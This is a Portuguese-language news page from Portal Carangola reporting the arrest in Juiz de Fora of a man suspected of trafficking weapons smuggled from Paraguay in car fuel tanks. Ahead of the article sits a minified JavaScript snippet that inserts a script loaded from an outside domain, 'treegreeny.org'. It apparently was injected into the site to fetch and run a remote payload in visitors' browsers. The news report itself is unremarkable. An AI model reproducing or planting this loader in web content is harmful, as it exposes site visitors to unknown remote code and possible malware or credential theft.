;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Em Juiz de Fora: Polícia Civil prende suspeito de ser o maior traficante de armas da região - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Em Juiz de Fora: Polícia Civil prende suspeito de ser o maior traficante de armas da região

Na última sexta-feira (8), a Polícia Civil de Minas Gerais prendeu, no centro de Juiz de Fora, um homem de 25 anos, suspeito de ser o maior traficante de armas da região.

Conforme informações do Delegado Rogério Woyame, após os policiais civis receberam informações de que o indivíduo teria um mandado de prisão expedido em seu desfavor, realizaram a operação de captura, obtendo êxito em sua prisão.

O suspeito já foi alvo de diversas investigações. “O criminoso fazia frequentes viagens para o Paraguai, ultrapassando a fronteira e adentrando no Brasil com armas e munições no tanque de combustível de automóveis. Os armamentos eram vendidos em Juiz de Fora e região para diversos criminosos que os utilizavam no cometimento de roubos, homicídios e outros crimes violentos”, explicou o Delegado.

Em dezembro de 2017, o investigado foi preso pela Polícia Rodoviária Federal no Oeste do Paraná, quando retornava pra a Zona da Mata mineira transportando, no tanque de combustível do veículo, quatro pistolas e vasta quantidade de munições.

Segundo o Delegado essa prisão foi de extrema relevância, “pois o comércio de armas na cidade impacta diretamente na estatística de crimes violentos”, concluiu.

Assessoria de Comunicação PCMG
Núcleo Avançado do 4º Departamento de Polícia em Juiz de Fora
Telefone:(32) 3692-5657

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.